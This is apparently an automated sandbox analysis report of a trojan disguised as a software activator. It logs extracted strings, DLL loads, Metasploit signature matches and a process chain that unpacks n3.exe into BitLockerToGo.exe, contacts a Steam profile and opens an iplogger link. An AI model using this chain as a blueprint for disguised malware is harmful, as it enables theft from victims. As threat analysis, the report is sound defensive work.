    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9//voice/regions
    Source: n3.exe, 00000002.00000002.2285591123.000000000282A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/09Az~~go_sched_gomaxprocs_threadsgo_memstats_alloc_bytes_totalgo_memstats
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/applications
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/channels/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/gateway
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/gateway/bot
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/guilds
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/guilds/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/guilds/https://discord.com/api/v9/channels/https://discord.com/api/v9/use
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/oauth2/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/oauth2/applications
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/stage-instances
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/stickers/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/webhooks/
    Source: n3.exeString found in binary or memory: https://github.com/golang/protobuf/issues/1609):
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: Activator by URKE v2.5.exe, 00000000.00000003.2297946552.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, uros.url.0.drString found in binary or memory: https://iplogger.com/1KhnJ4
    Source: Activator by URKE v2.5.exe, 00000000.00000003.2314678126.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000003.2315704743.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000002.2317043498.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000003.2297946552.00000267D7F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1KhnJ4&
    Source: Activator by URKE v2.5.exe, 00000000.00000003.2300449931.00000267D8021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1KhnJ4(
    Source: Activator by URKE v2.5.exe, 00000000.00000003.2314678126.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000003.2315704743.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000002.2317043498.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp, Activator by URKE v2.5.exe, 00000000.00000003.2297946552.00000267D7F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1KhnJ4.
    Source: Activator by URKE v2.5.exe, 00000000.00000003.2300449931.00000267D8021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1KhnJ4rr
    Source: dxcompiler.dllString found in binary or memory: https://llvm.org/svn/llvm-project/cfe/tags/RELEASE_370/final/lib/Basic/Version.cpp
    Source: n3.exeString found in binary or memory: https://login.microsoftonline.com/https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.n
    Source: n3.exeString found in binary or memory: https://manage.windowsazure.com/https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttp
    Source: n3.exeString found in binary or memory: https://management.core.windows.net/https://management.chinacloudapi.cn/https://servicebus.chinaclou
    Source: n3.exeString found in binary or memory: https://management.usgovcloudapi.net/https://servicebus.usgovcloudapi.net/https://batch.core.usgovcl
    Source: n3.exeString found in binary or memory: https://servicebus.windows.net/https://batch.core.windows.net/https://manage.windowsazure.us/https:/
    Source: n3.exe, 00000002.00000002.2285591123.00000000027DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002664000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/active.json
    Source: n3.exe, 00000002.00000002.2285591123.0000000002664000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/active.jsonhttps://status.discord.com/api/v
    Source: n3.exe, 00000002.00000002.2285591123.0000000002664000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/upcoming.json
    Source: BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: BitLockerToGo.exe, 00000003.00000002.2311503934.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765
    Source: BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AAD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AAD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900:kA
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: n3.exeString found in binary or memory: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comtoken
    Source: n3.exeString found in binary or memory: https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps://vault.azure.cn/vault.mi
    Source: DragExt64.dllString found in binary or memory: https://winscp.net/D
    Source: DragExt64.dllString found in binary or memory: https://winscp.net/eng/docs/dragext
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_00438BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00438BD0
    Source: duser.dll.0.dr Binary or memory string: DirectDrawCreateEx memstr_91e8b9e7-a

    System Summary

    Source: 00000002.00000003.2196083271.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
    Source: 00000002.00000002.2287277784.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 0040CAE0 appears 59 times
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 0041D140 appears 167 times
    Source: Activator by URKE v2.5.exe, 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameASUSSmartDisplayControl.exeV vs Activator by URKE v2.5.exe
    Source: Activator by URKE v2.5.exe, 00000000.00000003.2297946552.00000267D7F98000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameASUSSmartDisplayControl.exeV vs Activator by URKE v2.5.exe
    Source: 00000002.00000003.2196083271.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: 00000002.00000002.2287277784.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: classification engine Classification label: mal100.troj.evad.winEXE@22/30@27/10
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe Code function: 0_2_00007FF7E5EF3BF8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF7E5EF3BF8
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_0043820F CoCreateInstance,3_2_0043820F
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe Code function: 0_2_00007FF7E5F0C260 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF7E5F0C260
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0
    Source: Activator by URKE v2.5.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe File read: C:\Windows\win.ini
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: Activator by URKE v2.5.exe ReversingLabs: Detection: 47%
    Source: n3.exeString found in binary or memory: depgithub.com/docker/docker-credential-helpersv0.8.2h1:bX3YxiGzFP5sOXWc3bTPEXdEaZSeVMrFgOr3T+zrFAo=
    Source: n3.exeString found in binary or memory: net/addrselect.go
    Source: n3.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe File read: C:\Users\user\Desktop\Activator by URKE v2.5.exe
    Source: unknown Process created: C:\Users\user\Desktop\Activator by URKE v2.5.exe "C:\Users\user\Desktop\Activator by URKE v2.5.exe"
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe"
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.com/1KhnJ4
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2008,i,1522399523458594779,8666875280555869033,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: dxgidebug.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: ieframe.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: mlang.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Activator by URKE v2.5.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: Activator by URKE v2.5.exeStatic file information: File size 25037648 > 1048576
    Source: Activator by URKE v2.5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: Activator by URKE v2.5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: Activator by URKE v2.5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: Activator by URKE v2.5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Activator by URKE v2.5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: Activator by URKE v2.5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: Activator by URKE v2.5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: Binary string: drvstore.pdbUGP source: drvstore.dll
    Source: Binary string: DUI70.pdbUGP source: dui70.dll
    Source: Binary string: BitLockerToGo.pdb source: n3.exe, 00000002.00000002.2284662032.00000000025B8000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: main.PdBZjclTtSvJRifuFYQiitxyoCIkNHGKTcVnnvxAzYWmHRXTXqWdymDLj source: n3.exe
    Source: Binary string: dsreg.pdbGCTL source: dsreg.dll
    Source: Binary string: DWrite.pdbUGP source: DWrite.dll
    Source: Binary string: dsound.pdbUGP source: dsound.dll
    Source: Binary string: dpx.pdb source: dpx.dll
    Source: Binary string: BitLockerToGo.pdbGCTL source: n3.exe, 00000002.00000002.2284662032.00000000025B8000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: dsadmin.pdbGCTL source: dsadmin.dll
    Source: Binary string: dsuiext.pdb source: dsuiext.dll
    Source: Binary string: dosvc.pdb source: dosvc.dll
    Source: Binary string: dxgi.pdbUGP source: dxgi.dll
    Source: Binary string: DUI70.pdb source: dui70.dll
    Source: Binary string: DUser.pdbUGP source: duser.dll
    Source: Binary string: dxil.pdb source: dxil.dll
    Source: Binary string: dsreg.pdb source: dsreg.dll
    Source: Binary string: dpx.pdbGCTL source: dpx.dll
    Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\dxcompiler.dll.pdb source: dxcompiler.dll
    Source: Binary string: drvstore.pdb source: drvstore.dll
    Source: Binary string: dsuiext.pdbGCTL source: dsuiext.dll
    Source: Binary string: dwmcore.pdb source: dwmcore.dll
    Source: Binary string: DWrite.pdb source: DWrite.dll
    Source: Binary string: dsadmin.pdb source: dsadmin.dll
    Source: Binary string: dxgi.pdb source: dxgi.dll
    Source: Binary string: dwmcore.pdbUGP source: dwmcore.dll
    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: Activator by URKE v2.5.exe
    Source: Binary string: DUser.pdb source: duser.dll
    Source: Binary string: dsound.pdb source: dsound.dll
    Source: Binary string: dosvc.pdbUGP source: dosvc.dll
    Source: Activator by URKE v2.5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: Activator by URKE v2.5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: Activator by URKE v2.5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: Activator by URKE v2.5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: Activator by URKE v2.5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: DWrite.dll.0.drStatic PE information: 0x9E3099E0 [Fri Feb 6 10:07:28 2054 UTC]
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_5548796Jump to behavior
    Source: Activator by URKE v2.5.exeStatic PE information: section name: .didat
    Source: Activator by URKE v2.5.exeStatic PE information: section name: _RDATA
    Source: duser.dll.0.drStatic PE information: section name: .didat
    Source: dwmcore.dll.0.drStatic PE information: section name: .didat
    Source: DWrite.dll.0.drStatic PE information: section name: RT_CODE
    Source: DWrite.dll.0.drStatic PE information: section name: .didat
    Source: dxcompiler.dll.0.drStatic PE information: section name: .gxfg
    Source: dxcompiler.dll.0.drStatic PE information: section name: .retplne
    Source: dxcompiler.dll.0.drStatic PE information: section name: _RDATA
    Source: dxgi.dll.0.drStatic PE information: section name: .didat
    Source: dxil.dll.0.drStatic PE information: section name: _RDATA
    Source: n3.exe.0.drStatic PE information: section name: .symtab
    Source: dosvc.dll.0.drStatic PE information: section name: .didat
    Source: dpx.dll.0.drStatic PE information: section name: .didat
